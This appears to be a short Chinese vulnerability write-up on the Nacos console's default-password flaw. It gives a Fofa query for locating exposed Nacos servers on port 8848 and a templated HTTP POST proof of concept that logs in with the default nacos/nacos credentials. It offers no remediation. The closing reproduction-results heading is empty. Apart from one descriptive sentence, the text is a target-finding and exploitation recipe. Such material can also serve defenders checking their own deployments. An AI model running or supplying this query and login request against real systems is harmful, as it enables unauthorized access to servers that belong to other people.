漏洞描述:
Nacos控制台默认口令漏洞是一个重要的安全问题,它涉及到未经授权的访问风险。在Nacos的某些版本中,如果使用了默认的口令或密钥,攻击者可能会利用这些默认设置来绕过身份认证,直接获得对Nacos的访问权限。
搜索语法:
Fofa-Query: ip.port=="8848" and title=="HTTP Status 404 – Not Found"
漏洞详情:
1.Nacos服务系统。
2.漏洞POC:
POST /nacos/v1/auth/users/login HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Host: {{Hostname}}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close
username=nacos&password=nacos
3.漏洞复现结果。